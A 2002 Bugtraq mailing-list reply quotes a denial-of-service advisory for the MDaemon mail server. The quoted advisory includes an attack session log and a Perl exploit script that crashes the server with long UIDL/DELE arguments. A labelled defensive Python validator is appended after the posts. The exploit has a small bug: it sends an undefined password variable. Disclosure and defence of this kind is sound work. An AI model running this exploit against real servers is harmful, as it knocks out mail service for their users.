Re: MDaemon SMTP/POP/IMAP server DoS

From: Karl Pietri (kpietriat_private)
Date: Tue Oct 29 2002 - 09:12:02 PST


    5.0.7 not vulnerable (tested on registered pro server). Tested dele and uidl
    both with over 40b of 1.
    
    -Karl Pietri
    ----- Original Message -----
    From: "D4rkGr3y" <grey_1999at_private>
    To: <bugtraqat_private>; <submissionsat_private>;
    <vulnwatchat_private>
    Sent: Sunday, October 27, 2002 11:49 AM
    Subject: MDaemon SMTP/POP/IMAP server DoS
    
    
    > ######################################################
    > #Product: MDaemon SMTP/POP/IMAP server               #
    > #Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
    > #Vulnerable versions: v.6.0.7 and below              #
    > #Vulnerability: buffer overflow                      #
    > #Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
    > ######################################################
    >
    > #Overview#--------------------------------------------------------------#
    > From MDaemon's help file:
    > "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
    > commonplace on UNIX hosts and the Internet to Windows based servers
    > and microcomputers. MDaemon is designed to manage the email needs of
    > any number of individual users and comes complete with a powerful set
    > of integrated tools for managing mail accounts and message formats.
    > MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
    > with LDAP support, an integrated browser-based email client, content
    > filtering, spam blockers, extensive security features, and more."
    >
    > #Problem#----------------------------------------------------------------#
    > Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
    > sending long arguments (32b and above) with DELE or UIDL commands.
    > To do this you must have at least a mail account on the vulnerable host.
    > After getting a long request from the client, all MDaemon's services will be
    > closed (smtp, imap, pop, (?)worldclient).
    > Here is the log of an attack on a local MDaemon POP-server:
    >
    > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210271036.AA3656130MD0012at_private>
    > USER D4rkGr3y
    > +OK D4rkGr3y... Recipient ok
    > PASS cool-pass
    > +OK D4rkGr3yat_private's mailbox has 1 total messages (18356 octets).
    > UIDL 11111111111111111111111111111111
    >
    > Connection to host lost...
    >
    > #Exploit#----------------------------------------------------------------#
    >
    > #!/usr/bin/perl
    > #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
    > use IO::Socket;
    > $host = "[vuln_host]";
    > $login = "[login]";
    > $pass = "[pass]";
    > $port = "110";
    > $data = "1";
    > $num = "32";
    > $buf .= $data x $num;
    > $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
    > or die "Couldn't connect: @!\n";
    > print $socket "USER $login\n";
    > print $socket "PASS $user\n";
    > print $socket "UIDL $buf\n";
    > close($socket);
    >
    > #EOF
    >
    > Best regards               www.dhgroup.org
    >   D4rkGr3y                    icq 540981
    >
    >
    >
    
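Added example, not part of either post and not MDaemon's code: a server-side check for the DELE and UIDL arguments discussed above. The 32-character argument in the quoted log is within RFC 1939's 40-character argument limit, so a length cap alone does not reject it; the check also validates the argument as a message number against the mailbox size. The function names and `MAX_MSG_DIGITS` are assumptions made for illustration.

```python
import re

MAX_ARG_LEN = 40      # RFC 1939: each argument may be up to 40 characters
MAX_MSG_DIGITS = 10   # assumption: sanity bound on a message number's length
MSG_NUMBER = re.compile(r"[0-9]+\Z")

def check_msg_command(line: bytes, msg_count: int) -> tuple[bool, str]:
    """Validate one DELE/UIDL line before any mailbox code sees the argument."""
    parts = line.rstrip(b"\r\n").decode("ascii", errors="replace").split(" ")
    keyword, args = parts[0].upper(), parts[1:]
    if keyword not in ("DELE", "UIDL"):
        return False, "not a DELE/UIDL command"
    if keyword == "UIDL" and not args:
        return True, "ok"                       # bare UIDL lists every message
    if len(args) != 1:
        return False, "wrong number of arguments"
    arg = args[0]
    if len(arg) > MAX_ARG_LEN:
        return False, "argument longer than RFC 1939 allows"
    if not MSG_NUMBER.match(arg) or len(arg) > MAX_MSG_DIGITS:
        return False, "argument is not a plausible message number"
    if not 1 <= int(arg) <= msg_count:
        return False, "no such message"
    return True, "ok"

def rejected(lines: list[bytes], msg_count: int) -> list[tuple[bytes, str]]:
    """Return the (line, reason) pairs that fail the check."""
    out = []
    for line in lines:
        ok, reason = check_msg_command(line, msg_count)
        if not ok:
            out.append((line, reason))
    return out

# Constructed sample input for a mailbox holding 1 message, as in the quoted log.
SAMPLE = [
    b"UIDL\r\n",
    b"DELE 1\r\n",
    b"UIDL " + b"1" * 32 + b"\r\n",   # argument length from the advisory
    b"DELE " + b"1" * 45 + b"\r\n",   # "over 40" as in the reply's retest
    b"DELE 2\r\n",
]

if __name__ == "__main__":
    for line, reason in rejected(SAMPLE, msg_count=1):
        print(line[:24], "->", reason)
```

A rejected line should get a `-ERR` reply and be logged with the authenticated account name, since the advisory notes that a valid mail account is needed to reach these commands.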


